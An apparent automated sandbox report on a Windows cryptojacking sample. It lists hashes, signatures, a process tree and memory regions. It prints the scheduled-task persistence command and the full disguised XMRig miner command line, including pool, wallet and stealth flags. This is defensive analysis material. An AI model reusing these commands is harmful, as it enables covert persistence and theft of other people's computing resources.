Analysis
-
max time kernel
155s -
max time network
149s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
14-10-2021 05:08
Static task
static1
Behavioral task
behavioral1
Sample
342ef4f2941187bdc7f66d148be0ff75.exe
Resource
win7v20210408
General
-
Target
342ef4f2941187bdc7f66d148be0ff75.exe
-
Size
2.1MB
-
MD5
342ef4f2941187bdc7f66d148be0ff75
-
SHA1
7ff601a24c42ec01ef62c097927688a431c5aa76
-
SHA256
046976da5783b0425976084bc16ababee1094e98a1f0648fc10c91dcf49bc395
-
SHA512
84d9c5c7b83481e18efeecf8814bd050fd283dc1408a9a02fdc786ae2f8f08355ff87e24ab47a75e08291f0d75e8ae6747bb247e6a8859e8662d1999454605b2
Malware Config
Signatures
-
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/1360-161-0x00000001402F327C-mapping.dmp xmrig behavioral2/memory/1360-160-0x0000000140000000-0x0000000140763000-memory.dmp xmrig behavioral2/memory/1360-164-0x0000000140000000-0x0000000140763000-memory.dmp xmrig -
Blocklisted process makes network request 1 IoCs
Processes:
cmd.exeflow pid process 24 1360 cmd.exe -
Executes dropped EXE 2 IoCs
Processes:
services64.exesihost64.exepid process 2184 services64.exe 2392 sihost64.exe -
Drops file in System32 directory 3 IoCs
Processes:
conhost.execonhost.exedescription ioc process File created C:\Windows\system32\Microsoft\Libs\WR64.sys conhost.exe File created C:\Windows\system32\services64.exe conhost.exe File created C:\Windows\system32\Microsoft\Libs\sihost64.exe conhost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 3244 set thread context of 1360 3244 conhost.exe cmd.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
conhost.execonhost.execmd.exepid process 1452 conhost.exe 3244 conhost.exe 3244 conhost.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
conhost.execonhost.execmd.exedescription pid process Token: SeDebugPrivilege 1452 conhost.exe Token: SeDebugPrivilege 3244 conhost.exe Token: SeLockMemoryPrivilege 1360 cmd.exe Token: SeLockMemoryPrivilege 1360 cmd.exe -
Suspicious use of WriteProcessMemory 34 IoCs
Processes:
342ef4f2941187bdc7f66d148be0ff75.execonhost.execmd.execmd.exeservices64.execonhost.exesihost64.exedescription pid process target process PID 2492 wrote to memory of 1452 2492 342ef4f2941187bdc7f66d148be0ff75.exe conhost.exe PID 2492 wrote to memory of 1452 2492 342ef4f2941187bdc7f66d148be0ff75.exe conhost.exe PID 2492 wrote to memory of 1452 2492 342ef4f2941187bdc7f66d148be0ff75.exe conhost.exe PID 1452 wrote to memory of 4008 1452 conhost.exe cmd.exe PID 1452 wrote to memory of 4008 1452 conhost.exe cmd.exe PID 4008 wrote to memory of 1212 4008 cmd.exe schtasks.exe PID 4008 wrote to memory of 1212 4008 cmd.exe schtasks.exe PID 1452 wrote to memory of 2944 1452 conhost.exe cmd.exe PID 1452 wrote to memory of 2944 1452 conhost.exe cmd.exe PID 2944 wrote to memory of 2184 2944 cmd.exe services64.exe PID 2944 wrote to memory of 2184 2944 cmd.exe services64.exe PID 2184 wrote to memory of 3244 2184 services64.exe conhost.exe PID 2184 wrote to memory of 3244 2184 services64.exe conhost.exe PID 2184 wrote to memory of 3244 2184 services64.exe conhost.exe PID 3244 wrote to memory of 2392 3244 conhost.exe sihost64.exe PID 3244 wrote to memory of 2392 3244 conhost.exe sihost64.exe PID 3244 wrote to memory of 1360 3244 conhost.exe cmd.exe PID 3244 wrote to memory of 1360 3244 conhost.exe cmd.exe PID 3244 wrote to memory of 1360 3244 conhost.exe cmd.exe PID 3244 wrote to memory of 1360 3244 conhost.exe cmd.exe PID 3244 wrote to memory of 1360 3244 conhost.exe cmd.exe PID 3244 wrote to memory of 1360 3244 conhost.exe cmd.exe PID 3244 wrote to memory of 1360 3244 conhost.exe cmd.exe PID 3244 wrote to memory of 1360 3244 conhost.exe cmd.exe PID 3244 wrote to memory of 1360 3244 conhost.exe cmd.exe PID 3244 wrote to memory of 1360 3244 conhost.exe cmd.exe PID 3244 wrote to memory of 1360 3244 conhost.exe cmd.exe PID 3244 wrote to memory of 1360 3244 conhost.exe cmd.exe PID 3244 wrote to memory of 1360 3244 conhost.exe cmd.exe PID 3244 wrote to memory of 1360 3244 conhost.exe cmd.exe PID 3244 wrote to memory of 1360 3244 conhost.exe cmd.exe PID 2392 wrote to memory of 4052 2392 sihost64.exe conhost.exe PID 2392 wrote to memory of 4052 2392 sihost64.exe conhost.exe PID 2392 wrote to memory of 4052 2392 sihost64.exe conhost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\342ef4f2941187bdc7f66d148be0ff75.exe"C:\Users\Admin\AppData\Local\Temp\342ef4f2941187bdc7f66d148be0ff75.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\342ef4f2941187bdc7f66d148be0ff75.exe"2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services64.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\services64.exeC:\Windows\system32\services64.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Windows\system32\services64.exe"5⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "/sihost64"7⤵
-
C:\Windows\System32\cmd.exeC:\Windows/System32\cmd.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:5555 --user=44z5DkTXSYBfYECbt5TdQ2SUpyAQJmmGubyUsWqzcByeKwxwsWSZabZQMuE39hedNcTL15eK8kHrAeZMUdGGmHQHBzNH5db --pass=bandit --cpu-max-threads-hint=10 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --cinit-stealth6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logMD5
84f2160705ac9a032c002f966498ef74
SHA1e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
SHA2567840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
SHA512f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57
-
C:\Windows\System32\Microsoft\Libs\sihost64.exeMD5
9eb9be816f6263b25bee3aa6038f58f9
SHA16c3ddf1e31c349515ea2bb7e417e888077bcdfec
SHA256eec088b4b6f93002acab11f86b13e8bea3f179bb3b7008150da623d23bd6ec0e
SHA512441d78848b8e1ecfa74bd37f512761d9fb43e2d46e88fb9f3791ec24a3fd3022176ba336e296f4d16f50340a3129db7ecb9770b3c7969365fa2e78ab370ea4ff
-
C:\Windows\System32\services64.exeMD5
342ef4f2941187bdc7f66d148be0ff75
SHA17ff601a24c42ec01ef62c097927688a431c5aa76
SHA256046976da5783b0425976084bc16ababee1094e98a1f0648fc10c91dcf49bc395
SHA51284d9c5c7b83481e18efeecf8814bd050fd283dc1408a9a02fdc786ae2f8f08355ff87e24ab47a75e08291f0d75e8ae6747bb247e6a8859e8662d1999454605b2
-
C:\Windows\system32\Microsoft\Libs\sihost64.exeMD5
9eb9be816f6263b25bee3aa6038f58f9
SHA16c3ddf1e31c349515ea2bb7e417e888077bcdfec
SHA256eec088b4b6f93002acab11f86b13e8bea3f179bb3b7008150da623d23bd6ec0e
SHA512441d78848b8e1ecfa74bd37f512761d9fb43e2d46e88fb9f3791ec24a3fd3022176ba336e296f4d16f50340a3129db7ecb9770b3c7969365fa2e78ab370ea4ff
-
C:\Windows\system32\services64.exeMD5
342ef4f2941187bdc7f66d148be0ff75
SHA17ff601a24c42ec01ef62c097927688a431c5aa76
SHA256046976da5783b0425976084bc16ababee1094e98a1f0648fc10c91dcf49bc395
SHA51284d9c5c7b83481e18efeecf8814bd050fd283dc1408a9a02fdc786ae2f8f08355ff87e24ab47a75e08291f0d75e8ae6747bb247e6a8859e8662d1999454605b2
-
memory/1212-133-0x0000000000000000-mapping.dmp
-
memory/1360-180-0x00000151E63D0000-0x00000151E63F0000-memory.dmpFilesize
128KB
-
memory/1360-164-0x0000000140000000-0x0000000140763000-memory.dmpFilesize
7.4MB
-
memory/1360-161-0x00000001402F327C-mapping.dmp
-
memory/1360-160-0x0000000140000000-0x0000000140763000-memory.dmpFilesize
7.4MB
-
memory/1360-163-0x00000151E4A00000-0x00000151E4A20000-memory.dmpFilesize
128KB
-
memory/1360-166-0x00000151E4A30000-0x00000151E4A32000-memory.dmpFilesize
8KB
-
memory/1360-165-0x00000151E4A30000-0x00000151E4A32000-memory.dmpFilesize
8KB
-
memory/1360-181-0x00000151E63F0000-0x00000151E6410000-memory.dmpFilesize
128KB
-
memory/1360-167-0x00000151E4A40000-0x00000151E4A60000-memory.dmpFilesize
128KB
-
memory/1452-128-0x000001D853240000-0x000001D853242000-memory.dmpFilesize
8KB
-
memory/1452-123-0x000001D853240000-0x000001D853242000-memory.dmpFilesize
8KB
-
memory/1452-115-0x000001D853240000-0x000001D853242000-memory.dmpFilesize
8KB
-
memory/1452-121-0x000001D851410000-0x000001D85161C000-memory.dmpFilesize
2.0MB
-
memory/1452-116-0x000001D853240000-0x000001D853242000-memory.dmpFilesize
8KB
-
memory/1452-118-0x000001D853240000-0x000001D853242000-memory.dmpFilesize
8KB
-
memory/1452-135-0x000001D853240000-0x000001D853242000-memory.dmpFilesize
8KB
-
memory/1452-117-0x000001D853240000-0x000001D853242000-memory.dmpFilesize
8KB
-
memory/1452-119-0x000001D86BDF0000-0x000001D86BFF8000-memory.dmpFilesize
2.0MB
-
memory/1452-127-0x000001D853240000-0x000001D853242000-memory.dmpFilesize
8KB
-
memory/1452-122-0x000001D853290000-0x000001D853292000-memory.dmpFilesize
8KB
-
memory/1452-126-0x000001D8532C0000-0x000001D8532C1000-memory.dmpFilesize
4KB
-
memory/1452-124-0x000001D853293000-0x000001D853295000-memory.dmpFilesize
8KB
-
memory/1452-125-0x000001D853296000-0x000001D853297000-memory.dmpFilesize
4KB
-
memory/2184-136-0x0000000000000000-mapping.dmp
-
memory/2392-156-0x0000000000000000-mapping.dmp
-
memory/2944-134-0x0000000000000000-mapping.dmp
-
memory/3244-148-0x0000024939570000-0x0000024939572000-memory.dmpFilesize
8KB
-
memory/3244-150-0x00000249538D3000-0x00000249538D5000-memory.dmpFilesize
8KB
-
memory/3244-159-0x0000024939570000-0x0000024939572000-memory.dmpFilesize
8KB
-
memory/3244-151-0x00000249538D6000-0x00000249538D7000-memory.dmpFilesize
4KB
-
memory/3244-162-0x0000024939570000-0x0000024939572000-memory.dmpFilesize
8KB
-
memory/3244-149-0x00000249538D0000-0x00000249538D2000-memory.dmpFilesize
8KB
-
memory/3244-140-0x0000024939570000-0x0000024939572000-memory.dmpFilesize
8KB
-
memory/3244-146-0x0000024939570000-0x0000024939572000-memory.dmpFilesize
8KB
-
memory/3244-143-0x0000024939570000-0x0000024939572000-memory.dmpFilesize
8KB
-
memory/3244-142-0x0000024939570000-0x0000024939572000-memory.dmpFilesize
8KB
-
memory/3244-141-0x0000024939570000-0x0000024939572000-memory.dmpFilesize
8KB
-
memory/3244-152-0x0000024939570000-0x0000024939572000-memory.dmpFilesize
8KB
-
memory/4008-132-0x0000000000000000-mapping.dmp
-
memory/4052-169-0x0000022AC19D0000-0x0000022AC19D2000-memory.dmpFilesize
8KB
-
memory/4052-171-0x0000022AC19D0000-0x0000022AC19D2000-memory.dmpFilesize
8KB
-
memory/4052-173-0x0000022ABFF90000-0x0000022ABFF96000-memory.dmpFilesize
24KB
-
memory/4052-175-0x0000022ADA380000-0x0000022ADA382000-memory.dmpFilesize
8KB
-
memory/4052-177-0x0000022ADA383000-0x0000022ADA385000-memory.dmpFilesize
8KB
-
memory/4052-176-0x0000022AC19D0000-0x0000022AC19D2000-memory.dmpFilesize
8KB
-
memory/4052-172-0x0000022AC1A00000-0x0000022AC1A02000-memory.dmpFilesize
8KB
-
memory/4052-178-0x0000022ADA386000-0x0000022ADA387000-memory.dmpFilesize
4KB
-
memory/4052-179-0x0000022AC19D0000-0x0000022AC19D2000-memory.dmpFilesize
8KB
-
memory/4052-170-0x0000022AC19D0000-0x0000022AC19D2000-memory.dmpFilesize
8KB
-
memory/4052-168-0x0000022AC19D0000-0x0000022AC19D2000-memory.dmpFilesize
8KB